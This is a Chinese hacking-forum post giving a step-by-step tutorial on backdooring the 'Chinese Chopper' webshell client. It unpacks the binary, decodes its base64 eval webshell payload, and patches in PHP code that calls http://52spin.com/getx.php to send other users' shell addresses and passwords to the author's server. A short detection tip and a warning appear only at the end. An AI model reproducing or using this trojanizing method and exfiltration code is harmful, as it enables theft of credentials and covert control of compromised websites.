TA的每日心情 | 擦汗
2017-6-6 13:33 |
|---|
签到天数: 53 天 [LV.5]常住居民I
|
记得去年某段时间,有个ID帐号在论坛发了个过狗的菜刀,具体是可看http://tieba.baidu.com/p/3187132003  冒充绿盟的人员四处发布带后门的菜刀,最后被大习科的大婶分分钟打脸~啪啪啪。。
那么好,进入正题,小白如何才能在菜刀添加后门~(添加后门和反后门差不多。除非是特屌的那种)我们需要的工具有 OD K8的飞刀一把 十六进制编辑器010 Editor 6.0 OC偏移量转换器 还有我们的主角神器中国菜刀。
我这里用的菜刀是caidao-20141213 红色版本,去年菜刀官网新发布的最新版本,具体大家想用什么的可以自己看着办,OK,第一步,先查壳脱壳,用PEiD查到菜刀使用的是UPX的壳
脱壳的话网上下载个UPX的脱壳机就可以了,烂大街了,这里就不说了,脱壳完后本地IE设置代理,127.0.0.1端口8080,那么我们就可以使用BurpLoader来拦截菜刀的数据包了,我们今天做一个在编辑文件然后在执行保存这个操作时候触发后门的这个菜刀,
抓到的数据包如下:
xiao=$xx%3Dchr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval/**/�($xx/**/�($yy[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9wZW4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pKT8iMSI6IjAiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=L2hvbWUvd2ViLzUyc3Bpbl9jb20vcHVibGljX2h0bWwvuvPDxS50eHQ%3D&z2=MTIzNDU%3D
我们需要改造的只需要Z0这一段
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9wZW4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pKT8iMSI6IjAiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D
使用K8飞刀解密,先执行URL解码,再进行Base64解码,解完后效果如下:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;echo@fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";;echo("|<-");die();
现在使用OD打开已经脱壳的菜刀主程序,右键查找关键字符串
echo @fwrite(fopen(base64_decode($_POST["z1"]),"w")
可知关键字符串对应内存地址是004492DE
现在使用 十六进制编辑器010 Editor 6.0 打开菜刀主程序,拉到底部,我这里选的偏移地址是ACC00, 通过OC偏移量转换器可知对应的内存地址是004ADCC0
所以现在我们只需要把后门代码添加到ACCC0这个偏移就可以了
这是未修改的数据包:
echo @fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";
这是要修改的数据包:
后面多了
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://52spin.com/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
我们使用16进制编辑器对后门代码进行转换,并转换成双字节,工具-转换
把转换后的代码在菜刀偏移地址ACC00处开始覆盖相同大小的数据,然后保存,到这里添加后门基本已经完成了
使用OD打开已经添加好后门的菜刀,跳转到关键字符串的004492DE地址
双击进行修改
然后保存,带有后门的菜刀就做好了。修改后抓到的数据包:
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9wZW4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pKT8iMSI6IjAiO2lmKEAkX0NPT0tJRVsnZjEnXSE9OTUpe0BzZXRjb29raWUoJ2YxJyw5NSk7QGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vNTJzcGluLmNvbS9nZXR4LnBocD9jYWlkYW89Jy4kX1NFUlZFUltIVFRQX0hPU1RdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXS4nX1A9Jy5rZXkoJF9QT1NUKSk7fSA7ZWNobygifDwtIik7ZGllKCk7
解码后=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;echo@fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://52spin.com/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));} ;echo("|<-");die();
在服务器根目录添加个接收shell地址和密码的PHP脚本文件getx.php
文件代码:
就可以在 后门.txt的文本里收到shell地址
52spin.com/m/1.php_P=xiao
 可以添加后门的有好几个地方,编辑触发、执行CMD时候触发、上传时候触发、下载时候触发。这些都可以作为后门触发的条件的
如果要检测后门,当然和添加后门一样,对拦截到每一个数据包进行解码查看,看看有没有后门地址咯
 大婶门可能觉得这玩意不咋的,但是写一个小白也能看懂的文章,让大神门说去吧
最后提醒大家一句就是,千万不要随意传播带后门的菜刀,不然分分钟被啪啪啪打脸的
|
评分
-
查看全部评分
|
发表于 2015-7-12 11:57:51
感谢楼主分享!